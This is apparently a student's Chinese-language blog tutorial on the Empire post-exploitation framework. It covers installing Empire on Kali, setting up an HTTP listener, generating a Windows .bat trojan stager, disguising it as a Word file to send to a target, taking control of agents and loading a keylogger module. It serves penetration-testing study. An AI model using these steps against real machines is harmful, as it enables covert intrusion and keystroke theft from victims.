【无标题】网络渗透测试基础之帝国202105110124郭静

1.下载帝国的三个方法
1.1 window中通过网站下载
Releases · EmpireProject/Empire · GitHub

使用empire2.5版本,不是所有电脑都适用(kali)

1.2 kali中直接下载
(root账号下执行命令)

git clone https://github.com/BC-SECURITY/Empire   #下载帝国

cd  Empire3083f54973374903822e1b3987168731.jpg

 

查看python环境
python

python2

退出python环境487436f7482b43079d6c817a590d927f.jpg

1.3 kali中通过powershell安装
1.3.1开启服务
 sudo  apt install powrshell-empire  #安装帝国548f7c7dba084fe3891e71f13a13b8f8.jpg

 powershell-empire  server  #开启服务8f0c8ac03dd74ff6aebaf328e918b1dd.jpg

  powershell-empire  client  #开启客户端e7159aad84b04708ae32b9c919443f6b.jpg

 2.监听命令
2.1监听hhtp
 listeners  #进入监听界面bb1b579dbb8a4c9d87e40ae649f85f2d.jpg

#进入http监听模式d00514c6bebb4ff59e06ae64bcab9e05.jpg

 2.2 ipconfig查看虚拟机ip(监听者)483b11312bf24abe8d0bbe1f009504b7.jpg

2.3设置监听
set  Name text1  #设置一个监听

set  Host  192.168.48.128/9999

set  Port 9999

execute #回到监听页面

list / listenersb7e43f096dac40cf9d08d9f81b04ebe2.jpg

2.4 木马
2.4.1 生成bat类型的木马
uselistener

usestager windows/launcher_bat 

info  #查看一些基本信息f0f0f2a6493045499a83af33f45f6023.jpg

 set Listener text1 #设置你想使用哪个监听线程

按照路径提示找木马文件

agents  #查看监听状态

interact  代理名称  #连接操作系统1d95c7ceabc84df8a99812f5fbbc9161.jpg

35013868a968450fb72f73cff10c92db.jpg

复制生成的木马发送到主机桌面

bat可以使用word进行伪装

94bf9271b942425784275207830a5571.jpg

 

 2.4.2 监听键盘
usemodule powershell/collection/keylogger

d86d281dcbe9400e8622bf84478590f7.jpg

 

版权声明:本文为weixin_67854030原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明。